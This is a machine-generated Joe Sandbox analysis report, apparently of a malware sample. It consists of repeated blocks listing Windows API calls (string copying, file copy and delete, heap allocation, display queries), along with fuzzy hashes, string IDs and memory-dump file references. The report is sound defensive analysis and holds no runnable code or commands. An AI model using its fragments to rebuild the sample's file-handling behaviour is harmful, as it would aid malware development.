                                                                                                                                                                                                                                                    • Opcode ID: 052bf8f9bf82955c349f38e319ccf66381a38a474e194ce5ec988e3c0945134b
                                                                                                                                                                                                                                                    • Instruction ID: 87a69e9d06c411c84ffed107f8f0b548295b328fa982fb72f2b8b62efd16d617
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 052bf8f9bf82955c349f38e319ccf66381a38a474e194ce5ec988e3c0945134b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF0F0329987209BDF61BBE88807BDE72F06F01328F29024AF051A71D3CB691800DA56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0009009A
                                                                                                                                                                                                                                                      • Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC0D
                                                                                                                                                                                                                                                      • Part of subcall function 000AEBF8: __CxxThrowException@8.LIBCMT ref: 000AEC22
                                                                                                                                                                                                                                                      • Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC33
                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00090139
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0009014D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                                                                    • API String ID: 2448322171-3788999226
                                                                                                                                                                                                                                                    • Opcode ID: 2c6a3298aee4a2d4b0a665bb234262c73d12bb74e9d9398ec50aed17019052ba
                                                                                                                                                                                                                                                    • Instruction ID: 3aa2379afc9a5c2b560fc838693d8a587dfcf87f50372eaf6ae5a1603932fb98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6a3298aee4a2d4b0a665bb234262c73d12bb74e9d9398ec50aed17019052ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D731C572E423268FDF14FFACEC89AED77E59B05310F12402BE510EB2A1D6709D40AB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 000933AF
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,000B67E0,?), ref: 000933E8
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00093424
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: "x
                                                                                                                                                                                                                                                    • API String ID: 348468850-1521615046
                                                                                                                                                                                                                                                    • Opcode ID: 0f4518bbf92622a5e970985687e5c19bfbb417d8a61a339c341bef905b865c73
                                                                                                                                                                                                                                                    • Instruction ID: ed52e8f2465089dcf6d9fd677848b567d0d6f7a5daae632dd8eadf0ff0bc7fa5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f4518bbf92622a5e970985687e5c19bfbb417d8a61a339c341bef905b865c73
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9911AC71900504AFDF50DF94C945BDABBF8BF20305F128066E805EB192EB74EB489FA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00096DCD
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,0000001C), ref: 00096DD8
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096E5C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                                                                                                    • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                    • Opcode ID: d9d21677bad2a4e41b4f4b2749c0d63dcd0ec90fb9f7bebdfa7455b0d9c160c3
                                                                                                                                                                                                                                                    • Instruction ID: 5b9f31117403534b5eba513839a27642449d62b9f7149a1ec339f705d153620f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d21677bad2a4e41b4f4b2749c0d63dcd0ec90fb9f7bebdfa7455b0d9c160c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6110771D0150AAFCF80FFB4D946AEDBBB0BF04314B514131E824A7562E735EA65ABC1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0008F282
                                                                                                                                                                                                                                                      • Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC0D
                                                                                                                                                                                                                                                      • Part of subcall function 000AEBF8: __CxxThrowException@8.LIBCMT ref: 000AEC22
                                                                                                                                                                                                                                                      • Part of subcall function 000AEBF8: std::exception::exception.LIBCMT ref: 000AEC33
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0008F28D
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                    • API String ID: 1823113695-4289949731
                                                                                                                                                                                                                                                    • Opcode ID: 8bc8b04e7c708a71d78fea1ab9a4a4174222eb9c20757c11fe6e745b671b0a65
                                                                                                                                                                                                                                                    • Instruction ID: fd5487995619ea80a741ab4b378bbf928d113e675d4cf270dc91abfc69121cc8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bc8b04e7c708a71d78fea1ab9a4a4174222eb9c20757c11fe6e745b671b0a65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7ED012B1A1020DBBCB04E7D8DC169DEB6E99B45710F100179B706E3641EAB096004565
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00092301,?), ref: 00091D6C
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00091D73
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00091D84
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                    • String ID: %hs
                                                                                                                                                                                                                                                    • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                    • Opcode ID: 40167744c2ec842120271906248ff4332908e05dbcc9064b47f0d2508db7d23f
                                                                                                                                                                                                                                                    • Instruction ID: 0c8d607c77af6aae5ebbd89181b9dcbee5a4f4be203128e2d7770ae32e6f8d0a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40167744c2ec842120271906248ff4332908e05dbcc9064b47f0d2508db7d23f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39D09E7174521477E65027D5AC0DBDB7F28DB056A2F000121FB0D96291D96A455447D5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00081402
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0008140D
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00081416
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceRelease
                                                                                                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                                                                                                    • API String ID: 1843228801-865373369
                                                                                                                                                                                                                                                    • Opcode ID: 51c95787c4ceea8051c870d6c58fbc3e886902eb11e0d29e6bf4e9f3f5a8149f
                                                                                                                                                                                                                                                    • Instruction ID: c1ac2fed3e8307b73a43b2bbeed253eb9b10fb2dc0c2adf9709e18dbe81fec43
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51c95787c4ceea8051c870d6c58fbc3e886902eb11e0d29e6bf4e9f3f5a8149f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14D002357D4344BBF2702B65BD4EFAB2A64E7C6F52F200214F706B91E48AB814469637
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008B0C6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008B27C
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008B297
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008B2E9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
